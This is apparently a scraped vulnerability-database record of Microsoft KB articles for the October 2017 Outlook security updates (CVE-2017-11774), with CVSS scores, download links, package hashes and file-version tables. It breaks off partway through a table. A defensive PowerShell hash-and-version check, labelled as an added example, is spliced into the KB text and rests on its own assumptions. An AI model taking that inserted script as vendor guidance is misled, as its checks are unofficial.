Follow the installation instructions on the download page to install the update.\n\n * [Download the security update KB4011196 for the 32-bit version of Outlook 2010](<http://www.microsoft.com/download/details.aspx?familyid=dcb51340-7b39-4651-b382-045a5a1ddbba>)\n * [Download the security update KB4011196 for the 64-bit version of Outlook 2010](<http://www.microsoft.com/download/details.aspx?familyid=207e044e-feac-47dd-836e-1980ea5f5aeb>)\n\n## More Information\n\n### Security update deployment information\n\nFor deployment information about this update, see [security update deployment information: October 10, 2017](<https://support.microsoft.com/en-us/help/20171010>).\n\n### Security update replacement information\n\nThis security update replaces previously released security update [KB 4011089](<http://support.microsoft.com/kb/4011089>).\n\n### File hash information\n\nPackage Name| Package Hash SHA 1| Package Hash SHA 2 \n---|---|--- \noutlookloc2010-kb4011196-fullfile-x64-glb.exe| B24134605DD80F596E0552A9CD660003980D3E43| E4B9A0B1C9DEED4C59829322CABE0A7F1E84181AF623F4CB4BF1341A0B96A084 \noutlookloc2010-kb4011196-fullfile-x86-glb.exe| B56D19E495D7688B73478CC4AF62962E6CA47B44| 98264CF24727746C206DC6DDA45FE1C234B81EC6CB86508F05F4DDC09BD86B85 \n \n### File information\n\nThe English version of this security update has the file attributes (or later file attributes) that are listed in the following table. The dates and times for these files are listed in Coordinated Universal Time (UTC). The dates and times for these files on your local computer are displayed in your local time together with your current daylight-saving time (DST) bias. 
Additionally, the dates and times may change when you perform certain operations on the files.\n\n \nHow to get help and support for this security updateHelp for installing updates: [Windows Update FAQ](<https://support.microsoft.com/help/12373/windows-update-faq>)Security solutions for IT professionals: [Security Support and Troubleshooting](<https://technet.microsoft.com/security/bb980617.aspx>)Help for protecting your Windows-based computer from viruses and malware: [Microsoft Secure](<https://support.microsoft.com/contactus/cu_sc_virsec_master>)Local support according to your country: [International Support](<http://support.microsoft.com>)Propose a feature or provide feedback on Office: [Office User Voice portal](<https://office.uservoice.com/>)\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-10-10T07:00:00", "type": "mskb", "title": "Description of the security update for Outlook 2010: October 10, 2017", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", 
"baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11774"], "modified": "2017-10-10T07:00:00", "id": "KB4011196", "href": "https://support.microsoft.com/en-us/help/4011196", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-25T10:46:50", "description": "None\n## Summary\n\nThis security update resolves vulnerabilities in Microsoft Office that could allow remote code execution if a user opens a specially crafted Office file. To learn more about these vulnerabilities, see [Microsoft Common Vulnerabilities and Exposures CVE-2017-11774](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11774>) and [Microsoft Common Vulnerabilities and Exposures CVE-2017-11776](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11776>). \n \n**Note** To apply this security update, you must have the release version of Outlook 2016 installed on the computer.Be aware that the update in the Microsoft Download Center applies to the Microsoft Installer (.msi)-based edition of Office 2016. It doesn't apply to the Office 2016 Click-to-Run editions, such as Microsoft Office 365 Home. 
(See "Determining your Office version".)

## Improvements and fixes

This security update contains the following improvements and fixes:

* Outlook will not connect with MAPI/HTTP if certain HTTP headers are received by the client with unexpected type casing.
* You occasionally experience an error when you try to access the address book.
* When you open a recurring meeting with exceptions in Outlook 2016, the meeting details may be lost.
* An add-in (web extension) returns an incorrect Exchange Web Services (EWS) URL if the internal and external EWS URLs are different.
* After you send an email message in Outlook 2016 that has an IMAP account configured, the message appears in the Drafts folder again.
* When you forward or reply to an HTML email message that has some images in Outlook 2016, one or more attachments or inline images may be lost.
* When you use Outlook.com to send email messages to users who are outside the service, those messages show the winmail.dat files as attachments for those recipients.
* The Apps for Office button is no longer visible on the compose form if there are no legacy compose add-ins enabled.
* When you open a recurring meeting that has exceptions in Online mode in Outlook 2016, the meeting body may be blank.
* Updates the holiday information in the Outlook holiday file (Outlook.HOL) for Malaysia, Russia, and Trinidad and Tobago. To apply the change, follow these steps:
  1. Install this update, which contains the updated .HOL file.
  2. Go to **Calendar**, and then select **View** -> **Change View** -> **List** -> **Categories**.
  3. Select and delete the old holiday events that are grouped for the relevant location.
  4. Select **File** -> **Options** -> **Calendar** -> **Add Holidays**, check the relevant holiday group, and then select **OK**.
* Improves some translations for the Russian 32-bit version of Outlook 2016.

## How to get and install the update

### Method 1: Microsoft Update

This update is available from Microsoft Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to get security updates automatically, see [Windows Update: FAQ](<https://support.microsoft.com/en-us/help/12373/windows-update-faq>).

### Method 2: Microsoft Update Catalog

To get the stand-alone package for this update, go to the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/Search.aspx?q=KB4011162>) website.

### Method 3: Microsoft Download Center

You can get the stand-alone update package through the Microsoft Download Center. Follow the installation instructions on the download page to install the update.

* [Download the security update KB4011162 for the 32-bit version of Outlook 2016](<http://www.microsoft.com/download/details.aspx?familyid=982a95fa-4f1a-47f3-b862-cdc9b5a3967d>)
* [Download the security update KB4011162 for the 64-bit version of Outlook 2016](<http://www.microsoft.com/download/details.aspx?familyid=3155ed0b-9cd7-4336-ab64-6ce76d4cad89>)

## More Information

### Security update deployment information

For deployment information about this update, see [security update deployment information: October 10, 2017](<https://support.microsoft.com/en-us/help/20171010>).

### Security update replacement information

This security update replaces previously released security update [KB4011091](<http://support.microsoft.com/kb/4011091>).

### File hash information

| Package name | Package hash (SHA-1) | Package hash (SHA-256) |
|---|---|---|
| outlook2016-kb4011162-fullfile-x64-glb.exe | E131548EFD60A4F19B7720FEB064A3485E7A8B37 | C4EC930F479931281529C373894B9E70C16FF6A0381DFE1CB887F125F4147CE6 |
| outlook2016-kb4011162-fullfile-x86-glb.exe | 5D36BADCB16C2969273D537A1399D968D34AEB9C | D6F2D9B34D99C5F4EADC1117B8FBF050BDEB5FCCFD59A602E1021E7C2F1BBE46 |

### File information

The English version of this security update has the file attributes (or later file attributes) that are listed in the following tables. The dates and times for these files are listed in Coordinated Universal Time (UTC). The dates and times for these files on your local computer are displayed in your local time together with your current daylight saving time (DST) bias.
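The package hashes above and the per-file version tables that follow are the two things an administrator can actually check before and after deployment. The PowerShell below is an added example, not part of the Microsoft KB article or of the Talos post: it compares a downloaded KB4011162 package against the published SHA-256 value (the column the KB labels "SHA 2"), then reads the version resource of a few installed Outlook 2016 binaries and compares them numerically against the 16.0.4600.1000 baseline from the file tables. The install directories, the choice of which binaries to check, and the assumption that those five files are a sufficient indicator are illustrative assumptions; the hash and version values are the ones listed on this page.

```powershell
# Added example: verify a KB4011162 package and the installed Outlook 2016 patch level.
# Hash and version values are copied from the KB4011162 tables on this page; the paths
# and the set of files checked are assumptions for illustration, not from the KB.

# Published SHA-256 values for the two KB4011162 packages (labelled "SHA 2" in the KB).
$PublishedSha256 = @{
    'outlook2016-kb4011162-fullfile-x64-glb.exe' = 'C4EC930F479931281529C373894B9E70C16FF6A0381DFE1CB887F125F4147CE6'
    'outlook2016-kb4011162-fullfile-x86-glb.exe' = 'D6F2D9B34D99C5F4EADC1117B8FBF050BDEB5FCCFD59A602E1021E7C2F1BBE46'
}

function Test-PackageHash {
    param([Parameter(Mandatory)][string]$Path)
    $name = [System.IO.Path]::GetFileName($Path)
    if (-not $PublishedSha256.ContainsKey($name)) {
        throw "No published hash for '$name'; refusing to trust an unknown package."
    }
    # Only SHA-256 is compared. The KB also lists SHA-1, but SHA-1 is no longer
    # collision resistant, so it adds nothing once the SHA-256 value matches.
    $actual = (Get-FileHash -Path $Path -Algorithm SHA256).Hash
    [pscustomobject]@{
        Package  = $name
        Expected = $PublishedSha256[$name]
        Actual   = $actual
        Match    = ($actual -eq $PublishedSha256[$name])   # string -eq is case-insensitive
    }
}

# Minimum versions from the "File information" tables for core binaries that are
# identical for x86 and x64 in this update. Locale-specific files (outllibr.dll,
# mapir.dll) differ per language and are deliberately left out of the baseline.
# Assumption: these five files being at or above 16.0.4600.1000 indicates KB4011162
# is applied to an MSI-based install. Click-to-Run installs are out of scope.
$MinimumVersions = @{
    'outlook.exe'  = [version]'16.0.4600.1000'
    'olmapi32.dll' = [version]'16.0.4600.1000'
    'emsmdb32.dll' = [version]'16.0.4600.1000'
    'mspst32.dll'  = [version]'16.0.4600.1000'
    'outlmime.dll' = [version]'16.0.4600.1000'
}

function Test-OutlookPatchLevel {
    param(
        # Assumed default MSI install locations for 64-bit and 32-bit Office 2016.
        [string[]]$OfficeDirs = @(
            "$env:ProgramFiles\Microsoft Office\Office16",
            "${env:ProgramFiles(x86)}\Microsoft Office\Office16"
        )
    )
    $dir = $OfficeDirs | Where-Object { Test-Path (Join-Path $_ 'outlook.exe') } | Select-Object -First 1
    if (-not $dir) { throw 'outlook.exe not found in the assumed Office16 directories.' }

    foreach ($file in $MinimumVersions.Keys) {
        $path = Join-Path $dir $file
        if (-not (Test-Path $path)) {
            [pscustomobject]@{ File = $file; Installed = $null; Required = $MinimumVersions[$file]; Patched = $false }
            continue
        }
        # Build the version from the numeric parts of the version resource instead of
        # parsing the FileVersion string, so the comparison is numeric, not lexical.
        $vi = (Get-Item $path).VersionInfo
        $installed = New-Object System.Version($vi.FileMajorPart, $vi.FileMinorPart, $vi.FileBuildPart, $vi.FilePrivatePart)
        [pscustomobject]@{
            File      = $file
            Installed = $installed
            Required  = $MinimumVersions[$file]
            Patched   = ($installed -ge $MinimumVersions[$file])
        }
    }
}

# Usage (paths are examples):
#   Test-PackageHash -Path "$env:USERPROFILE\Downloads\outlook2016-kb4011162-fullfile-x64-glb.exe"
#   Test-OutlookPatchLevel | Format-Table -AutoSize
```

Run `Test-PackageHash` on the downloaded installer before it goes into any deployment share, and `Test-OutlookPatchLevel` on a host after the update to confirm the binaries actually moved to the listed versions; a host whose `outlook.exe` still reports an older build has not received the fix regardless of what the update history says. The same approach applies to the Outlook 2010 and Outlook 2013 packages on this page by substituting their published hashes and file versions.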
The dates and times may also change when you perform certain operations on the files.

### For all supported x86-based versions of Outlook 2016

| File identifier | File name | File version | File size | Date | Time |
|---|---|---|---|---|---|
| outlook.hol_1025 | outlook.hol | | 1300622 | 13-Sep-17 | 11:32 |
| outlook.hol_1026 | outlook.hol | | 1445192 | 13-Sep-17 | 11:32 |
| outlook.hol_1029 | outlook.hol | | 1414392 | 13-Sep-17 | 11:32 |
| outlook.hol_1030 | outlook.hol | | 1323070 | 13-Sep-17 | 11:32 |
| outlook.hol_1031 | outlook.hol | | 1366948 | 13-Sep-17 | 11:32 |
| outlook.hol_1032 | outlook.hol | | 1551916 | 13-Sep-17 | 11:32 |
| outlook.hol_3082 | outlook.hol | | 1454216 | 13-Sep-17 | 11:32 |
| outlook.hol_1061 | outlook.hol | | 1466058 | 13-Sep-17 | 11:32 |
| outlook.hol_1035 | outlook.hol | | 1449258 | 13-Sep-17 | 11:32 |
| outlook.hol_1036 | outlook.hol | | 1414270 | 13-Sep-17 | 11:32 |
| outlook.hol_1037 | outlook.hol | | 1279682 | 13-Sep-17 | 11:32 |
| outlook.hol_1081 | outlook.hol | | 1285370 | 13-Sep-17 | 11:32 |
| outlook.hol_1050 | outlook.hol | | 1323016 | 13-Sep-17 | 11:32 |
| outlook.hol_1038 | outlook.hol | | 1415312 | 13-Sep-17 | 11:32 |
| outlook.hol_1057 | outlook.hol | | 1386564 | 13-Sep-17 | 11:32 |
| outlook.hol_1040 | outlook.hol | | 1474676 | 13-Sep-17 | 11:32 |
| outlook.hol_1041 | outlook.hol | | 905776 | 13-Sep-17 | 11:32 |
| outlook.hol_1087 | outlook.hol | | 1426976 | 13-Sep-17 | 11:32 |
| outlook.hol_1042 | outlook.hol | | 924948 | 13-Sep-17 | 11:32 |
| outlook.hol_1063 | outlook.hol | | 1518110 | 13-Sep-17 | 11:32 |
| outlook.hol_1062 | outlook.hol | | 1537854 | 13-Sep-17 | 11:32 |
| outlook.hol_1086 | outlook.hol | | 1368974 | 13-Sep-17 | 11:32 |
| outlook.hol_1044 | outlook.hol | | 1402548 | 13-Sep-17 | 11:32 |
| outlook.hol_1043 | outlook.hol | | 1442834 | 13-Sep-17 | 11:32 |
| outlook.hol_1045 | outlook.hol | | 1515844 | 13-Sep-17 | 11:32 |
| outlook.hol_1046 | outlook.hol | | 1450584 | 13-Sep-17 | 11:32 |
| outlook.hol_2070 | outlook.hol | | 1485718 | 13-Sep-17 | 11:32 |
| outlook.hol_1048 | outlook.hol | | 1436690 | 13-Sep-17 | 11:32 |
| outlook.hol_1049 | outlook.hol | | 1426946 | 13-Sep-17 | 11:32 |
| outlook.hol_1051 | outlook.hol | | 1410664 | 13-Sep-17 | 11:32 |
| outlook.hol_1060 | outlook.hol | | 1350228 | 13-Sep-17 | 11:32 |
| outlook.hol_2074 | outlook.hol | | 1335562 | 13-Sep-17 | 11:32 |
| outlook.hol_9242 | outlook.hol | | 1343906 | 13-Sep-17 | 11:32 |
| outlook.hol_1053 | outlook.hol | | 1322670 | 13-Sep-17 | 11:32 |
| outlook.hol_1054 | outlook.hol | | 1390994 | 13-Sep-17 | 11:32 |
| outlook.hol_1055 | outlook.hol | | 1348932 | 13-Sep-17 | 11:32 |
| outlook.hol_1058 | outlook.hol | | 1530840 | 13-Sep-17 | 11:32 |
| outlook.hol_1066 | outlook.hol | | 1639200 | 13-Sep-17 | 11:32 |
| outlook.hol_2052 | outlook.hol | | 805796 | 13-Sep-17 | 11:32 |
| outlook.hol_1028 | outlook.hol | | 816268 | 13-Sep-17 | 11:32 |
| mapir.dll_1025 | mapir.dll | 16.0.4483.1000 | 1251040 | 13-Sep-17 | 11:32 |
| outllibr.dll_1025 | outllibr.dll | 16.0.4570.1000 | 7502568 | 13-Sep-17 | 11:32 |
| mapir.dll_1026 | mapir.dll | 16.0.4483.1000 | 1318112 | 13-Sep-17 | 11:32 |
| outllibr.dll_1026 | outllibr.dll | 16.0.4570.1000 | 7568616 | 13-Sep-17 | 11:32 |
| mapir.dll_1029 | mapir.dll | 16.0.4483.1000 | 1292512 | 13-Sep-17 | 11:32 |
| outllibr.dll_1029 | outllibr.dll | 16.0.4570.1000 | 7585512 | 13-Sep-17 | 11:32 |
| mapir.dll_1030 | mapir.dll | 16.0.4483.1000 | 1297632 | 13-Sep-17 | 11:32 |
| outllibr.dll_1030 | outllibr.dll | 16.0.4570.1000 | 7513320 | 13-Sep-17 | 11:32 |
| mapir.dll_1031 | mapir.dll | 16.0.4483.1000 | 1346272 | 13-Sep-17 | 11:32 |
| outllibr.dll_1031 | outllibr.dll | 16.0.4570.1000 | 7604456 | 13-Sep-17 | 11:32 |
| mapir.dll_1032 | mapir.dll | 16.0.4483.1000 | 1368288 | 13-Sep-17 | 11:32 |
| outllibr.dll_1032 | outllibr.dll | 16.0.4570.1000 | 7634152 | 13-Sep-17 | 11:32 |
| mapir.dll_3082 | mapir.dll | 16.0.4483.1000 | 1334496 | 13-Sep-17 | 11:32 |
| outllibr.dll_3082 | outllibr.dll | 16.0.4570.1000 | 7555816 | 13-Sep-17 | 11:32 |
| mapir.dll_1061 | mapir.dll | 16.0.4483.1000 | 1276640 | 13-Sep-17 | 11:32 |
| outllibr.dll_1061 | outllibr.dll | 16.0.4570.1000 | 7502056 | 13-Sep-17 | 11:32 |
| mapir.dll_1035 | mapir.dll | 16.0.4483.1000 | 1291488 | 13-Sep-17 | 11:32 |
| outllibr.dll_1035 | outllibr.dll | 16.0.4570.1000 | 7522024 | 13-Sep-17 | 11:32 |
| mapir.dll_1036 | mapir.dll | 16.0.4483.1000 | 1346784 | 13-Sep-17 | 11:32 |
| outllibr.dll_1036 | outllibr.dll | 16.0.4570.1000 | 7594216 | 13-Sep-17 | 11:32 |
| mapir.dll_1037 | mapir.dll | 16.0.4483.1000 | 1237216 | 13-Sep-17 | 11:32 |
| outllibr.dll_1037 | outllibr.dll | 16.0.4570.1000 | 7462120 | 13-Sep-17 | 11:32 |
| mapir.dll_1081 | mapir.dll | 16.0.4483.1000 | 1295072 | 13-Sep-17 | 11:32 |
| outllibr.dll_1081 | outllibr.dll | 16.0.4570.1000 | 7578856 | 13-Sep-17 | 11:32 |
| mapir.dll_1050 | mapir.dll | 16.0.4483.1000 | 1301216 | 13-Sep-17 | 11:32 |
| outllibr.dll_1050 | outllibr.dll | 16.0.4570.1000 | 7528680 | 13-Sep-17 | 11:32 |
| mapir.dll_1038 | mapir.dll | 16.0.4483.1000 | 1305312 | 13-Sep-17 | 11:32 |
| outllibr.dll_1038 | outllibr.dll | 16.0.4570.1000 | 7592168 | 13-Sep-17 | 11:32 |
| mapir.dll_1057 | mapir.dll | 16.0.4483.1000 | 1291488 | 13-Sep-17 | 11:32 |
| outllibr.dll_1057 | outllibr.dll | 16.0.4570.1000 | 7506152 | 13-Sep-17 | 11:32 |
| mapir.dll_1040 | mapir.dll | 16.0.4483.1000 | 1321184 | 13-Sep-17 | 11:32 |
| outllibr.dll_1040 | outllibr.dll | 16.0.4570.1000 | 7547624 | 13-Sep-17 | 11:32 |
| mapir.dll_1041 | mapir.dll | 16.0.4549.1000 | 1170656 | 13-Sep-17 | 11:32 |
| outllibr.dll_1041 | outllibr.dll | 16.0.4570.1000 | 7518952 | 13-Sep-17 | 11:32 |
| mapir.dll_1087 | mapir.dll | 16.0.4483.1000 | 1294560 | 13-Sep-17 | 11:32 |
| outllibr.dll_1087 | outllibr.dll | 16.0.4570.1000 | 7590120 | 13-Sep-17 | 11:32 |
| mapir.dll_1042 | mapir.dll | 16.0.4483.1000 | 1162464 | 13-Sep-17 | 11:32 |
| outllibr.dll_1042 | outllibr.dll | 16.0.4570.1000 | 7498984 | 13-Sep-17 | 11:32 |
| mapir.dll_1063 | mapir.dll | 16.0.4483.1000 | 1299680 | 13-Sep-17 | 11:32 |
| outllibr.dll_1063 | outllibr.dll | 16.0.4570.1000 | 7560936 | 13-Sep-17 | 11:32 |
| mapir.dll_1062 | mapir.dll | 16.0.4483.1000 | 1292512 | 13-Sep-17 | 11:32 |
| outllibr.dll_1062 | outllibr.dll | 16.0.4570.1000 | 7551720 | 13-Sep-17 | 11:32 |
| mapir.dll_1086 | mapir.dll | 16.0.4483.1000 | 1294048 | 13-Sep-17 | 11:32 |
| outllibr.dll_1086 | outllibr.dll | 16.0.4570.1000 | 7514856 | 13-Sep-17 | 11:32 |
| mapir.dll_1044 | mapir.dll | 16.0.4483.1000 | 1280736 | 13-Sep-17 | 11:32 |
| outllibr.dll_1044 | outllibr.dll | 16.0.4570.1000 | 7503592 | 13-Sep-17 | 11:32 |
| mapir.dll_1043 | mapir.dll | 16.0.4483.1000 | 1325792 | 13-Sep-17 | 11:32 |
| outllibr.dll_1043 | outllibr.dll | 16.0.4570.1000 | 7551208 | 13-Sep-17 | 11:32 |
| mapir.dll_1045 | mapir.dll | 16.0.4483.1000 | 1319648 | 13-Sep-17 | 11:32 |
| outllibr.dll_1045 | outllibr.dll | 16.0.4570.1000 | 7591656 | 13-Sep-17 | 11:32 |
| mapir.dll_1046 | mapir.dll | 16.0.4561.1000 | 1317088 | 13-Sep-17 | 11:32 |
| outllibr.dll_1046 | outllibr.dll | 16.0.4588.1000 | 7479016 | 13-Sep-17 | 11:32 |
| mapir.dll_2070 | mapir.dll | 16.0.4483.1000 | 1328352 | 13-Sep-17 | 11:32 |
| outllibr.dll_2070 | outllibr.dll | 16.0.4570.1000 | 7553256 | 13-Sep-17 | 11:32 |
| mapir.dll_1048 | mapir.dll | 16.0.4483.1000 | 1309408 | 13-Sep-17 | 11:32 |
| outllibr.dll_1048 | outllibr.dll | 16.0.4570.1000 | 7590632 | 13-Sep-17 | 11:32 |
| mapir.dll_1049 | mapir.dll | 16.0.4483.1000 | 1296608 | 13-Sep-17 | 11:32 |
| outllibr.dll_1049 | outllibr.dll | 16.0.4600.1000 | 7555816 | 14-Sep-17 | 01:09 |
| mapir.dll_1051 | mapir.dll | 16.0.4483.1000 | 1308896 | 13-Sep-17 | 11:32 |
| outllibr.dll_1051 | outllibr.dll | 16.0.4570.1000 | 7600872 | 13-Sep-17 | 11:32 |
| mapir.dll_1060 | mapir.dll | 16.0.4483.1000 | 1295072 | 13-Sep-17 | 11:32 |
| outllibr.dll_1060 | outllibr.dll | 16.0.4570.1000 | 7544040 | 13-Sep-17 | 11:32 |
| mapir.dll_2074 | mapir.dll | 16.0.4444.1000 | 1302752 | 13-Sep-17 | 11:32 |
| outllibr.dll_2074 | outllibr.dll | 16.0.4561.1000 | 7538920 | 13-Sep-17 | 11:32 |
| mapir.dll_9242 | mapir.dll | 16.0.4483.1000 | 1302752 | 13-Sep-17 | 11:32 |
| outllibr.dll_9242 | outllibr.dll | 16.0.4570.1000 | 7539432 | 13-Sep-17 | 11:32 |
| mapir.dll_1053 | mapir.dll | 16.0.4483.1000 | 1285344 | 13-Sep-17 | 11:32 |
| outllibr.dll_1053 | outllibr.dll | 16.0.4570.1000 | 7510752 | 13-Sep-17 | 11:32 |
| mapir.dll_1054 | mapir.dll | 16.0.4483.1000 | 1274080 | 13-Sep-17 | 11:32 |
| outllibr.dll_1054 | outllibr.dll | 16.0.4570.1000 | 7542504 | 13-Sep-17 | 11:32 |
| mapir.dll_1055 | mapir.dll | 16.0.4483.1000 | 1280224 | 13-Sep-17 | 11:32 |
| outllibr.dll_1055 | outllibr.dll | 16.0.4570.1000 | 7570152 | 13-Sep-17 | 11:32 |
| mapir.dll_1058 | mapir.dll | 16.0.4483.1000 | 1299680 | 13-Sep-17 | 11:32 |
| outllibr.dll_1058 | outllibr.dll | 16.0.4570.1000 | 7561960 | 13-Sep-17 | 11:32 |
| mapir.dll_1066 | mapir.dll | 16.0.4483.1000 | 1289440 | 13-Sep-17 | 11:32 |
| outllibr.dll_1066 | outllibr.dll | 16.0.4570.1000 | 7579880 | 13-Sep-17 | 11:32 |
| mapir.dll_2052 | mapir.dll | 16.0.4483.1000 | 1118432 | 13-Sep-17 | 11:32 |
| outllibr.dll_2052 | outllibr.dll | 16.0.4570.1000 | 7423208 | 13-Sep-17 | 11:32 |
| mapir.dll_1028 | mapir.dll | 16.0.4483.1000 | 1121504 | 13-Sep-17 | 11:32 |
| outllibr.dll_1028 | outllibr.dll | 16.0.4570.1000 | 7428832 | 13-Sep-17 | 11:32 |
| intldate.dll_0001 | intldate.dll | 16.0.4549.1000 | 109824 | 12-Sep-17 | 10:28 |
| outlook.hol_1033 | outlook.hol | | 1335562 | 12-Sep-17 | 10:27 |
| omsmain.dll | omsmain.dll | 16.0.4588.1000 | 753416 | 12-Sep-17 | 10:28 |
| omsxp32.dll | omsxp32.dll | 16.0.4588.1000 | 261416 | 12-Sep-17 | 10:28 |
| mapir.dll_1033 | mapir.dll | 16.0.4444.1000 | 1280736 | 12-Sep-17 | 10:27 |
| outllibr.dll_1033 | outllibr.dll | 16.0.4561.1000 | 7492328 | 12-Sep-17 | 10:27 |
| cnfnot32.exe_0004 | cnfnot32.exe | 16.0.4498.1000 | 176320 | 12-Sep-17 | 10:28 |
| contab32.dll | contab32.dll | 16.0.4600.1000 | 153336 | 14-Sep-17 | 01:00 |
| dlgsetp.dll | dlgsetp.dll | 16.0.4573.1000 | 109800 | 12-Sep-17 | 10:28 |
| emsmdb32.dll_0005 | emsmdb32.dll | 16.0.4600.1000 | 4323712 | 14-Sep-17 | 01:00 |
| envelope.dll | envelope.dll | 16.0.4600.1000 | 189712 | 14-Sep-17 | 01:00 |
| exsec32.dll_0001 | exsec32.dll | 16.0.4600.1000 | 338088 | 14-Sep-17 | 01:00 |
| mapiph.dll | mapiph.dll | 16.0.4498.1000 | 332616 | 12-Sep-17 | 10:28 |
| mimedir.dll | mimedir.dll | 16.0.4600.1000 | 446144 | 14-Sep-17 | 01:00 |
| mspst32.dll_0004 | mspst32.dll | 16.0.4600.1000 | 1686888 | 14-Sep-17 | 01:00 |
| olmapi32.dll | olmapi32.dll | 16.0.4600.1000 | 4785408 | 14-Sep-17 | 01:00 |
| outlmime.dll | outlmime.dll | 16.0.4600.1000 | 611608 | 14-Sep-17 | 01:00 |
| outlook.exe | outlook.exe | 16.0.4600.1000 | 23187144 | 14-Sep-17 | 01:00 |
| outlph.dll | outlph.dll | 16.0.4534.1000 | 358704 | 12-Sep-17 | 10:28 |
| outlvba.dll | outlvba.dll | 16.0.4600.1000 | 76536 | 14-Sep-17 | 01:00 |
| outlvbs.dll_0001 | outlvbs.dll | 16.0.4600.1000 | 75496 | 14-Sep-17 | 01:00 |
| pstprx32.dll | pstprx32.dll | 16.0.4600.1000 | 1392344 | 14-Sep-17 | 01:00 |
| rm.dll | rm.dll | 16.0.4312.1000 | 81584 | 12-Sep-17 | 10:28 |
| scnpst32.dll | scnpst32.dll | 16.0.4600.1000 | 460640 | 14-Sep-17 | 01:00 |
| scnpst64.dll | scnpst64.dll | 16.0.4600.1000 | 472424 | 14-Sep-17 | 01:00 |
| scnpst64c.dll | scnpst64c.dll | 16.0.4573.1000 | 673648 | 12-Sep-17 | 10:28 |

### For all supported x64-based versions of Outlook 2016

| File identifier | File name | File version | File size | Date | Time |
|---|---|---|---|---|---|
| outlook.hol_1025 | outlook.hol | | 1300622 | 13-Sep-17 | 11:35 |
| outlook.hol_1026 | outlook.hol | | 1445192 | 13-Sep-17 | 11:35 |
| outlook.hol_1029 | outlook.hol | | 1414392 | 13-Sep-17 | 11:35 |
| outlook.hol_1030 | outlook.hol | | 1323070 | 13-Sep-17 | 11:35 |
| outlook.hol_1031 | outlook.hol | | 1366948 | 13-Sep-17 | 11:35 |
| outlook.hol_1032 | outlook.hol | | 1551916 | 13-Sep-17 | 11:35 |
| outlook.hol_3082 | outlook.hol | | 1454216 | 13-Sep-17 | 11:35 |
| outlook.hol_1061 | outlook.hol | | 1466058 | 13-Sep-17 | 11:35 |
| outlook.hol_1035 | outlook.hol | | 1449258 | 13-Sep-17 | 11:35 |
| outlook.hol_1036 | outlook.hol | | 1414270 | 13-Sep-17 | 11:35 |
| outlook.hol_1037 | outlook.hol | | 1279682 | 13-Sep-17 | 11:35 |
| outlook.hol_1081 | outlook.hol | | 1285370 | 13-Sep-17 | 11:35 |
| outlook.hol_1050 | outlook.hol | | 1323016 | 13-Sep-17 | 11:35 |
| outlook.hol_1038 | outlook.hol | | 1415312 | 13-Sep-17 | 11:35 |
| outlook.hol_1057 | outlook.hol | | 1386564 | 13-Sep-17 | 11:35 |
| outlook.hol_1040 | outlook.hol | | 1474676 | 13-Sep-17 | 11:35 |
| outlook.hol_1041 | outlook.hol | | 905776 | 13-Sep-17 | 11:35 |
| outlook.hol_1087 | outlook.hol | | 1426976 | 13-Sep-17 | 11:35 |
| outlook.hol_1042 | outlook.hol | | 924948 | 13-Sep-17 | 11:35 |
| outlook.hol_1063 | outlook.hol | | 1518110 | 13-Sep-17 | 11:35 |
| outlook.hol_1062 | outlook.hol | | 1537854 | 13-Sep-17 | 11:35 |
| outlook.hol_1086 | outlook.hol | | 1368974 | 13-Sep-17 | 11:35 |
| outlook.hol_1044 | outlook.hol | | 1402548 | 13-Sep-17 | 11:35 |
| outlook.hol_1043 | outlook.hol | | 1442834 | 13-Sep-17 | 11:35 |
| outlook.hol_1045 | outlook.hol | | 1515844 | 13-Sep-17 | 11:35 |
| outlook.hol_1046 | outlook.hol | | 1450584 | 13-Sep-17 | 11:35 |
| outlook.hol_2070 | outlook.hol | | 1485718 | 13-Sep-17 | 11:35 |
| outlook.hol_1048 | outlook.hol | | 1436690 | 13-Sep-17 | 11:35 |
| outlook.hol_1049 | outlook.hol | | 1426946 | 13-Sep-17 | 11:35 |
| outlook.hol_1051 | outlook.hol | | 1410664 | 13-Sep-17 | 11:35 |
| outlook.hol_1060 | outlook.hol | | 1350228 | 13-Sep-17 | 11:35 |
| outlook.hol_2074 | outlook.hol | | 1335562 | 13-Sep-17 | 11:35 |
| outlook.hol_9242 | outlook.hol | | 1343906 | 13-Sep-17 | 11:35 |
| outlook.hol_1053 | outlook.hol | | 1322670 | 13-Sep-17 | 11:36 |
| outlook.hol_1054 | outlook.hol | | 1390994 | 13-Sep-17 | 11:36 |
| outlook.hol_1055 | outlook.hol | | 1348932 | 13-Sep-17 | 11:36 |
| outlook.hol_1058 | outlook.hol | | 1530840 | 13-Sep-17 | 11:36 |
| outlook.hol_1066 | outlook.hol | | 1639200 | 13-Sep-17 | 11:36 |
| outlook.hol_2052 | outlook.hol | | 805796 | 13-Sep-17 | 11:36 |
| outlook.hol_1028 | outlook.hol | | 816268 | 13-Sep-17 | 11:36 |
| mapir.dll_1025 | mapir.dll | 16.0.4483.1000 | 1251040 | 13-Sep-17 | 11:35 |
| outllibr.dll_1025 | outllibr.dll | 16.0.4570.1000 | 7502568 | 13-Sep-17 | 11:35 |
| mapir.dll_1026 | mapir.dll | 16.0.4483.1000 | 1318112 | 13-Sep-17 | 11:35 |
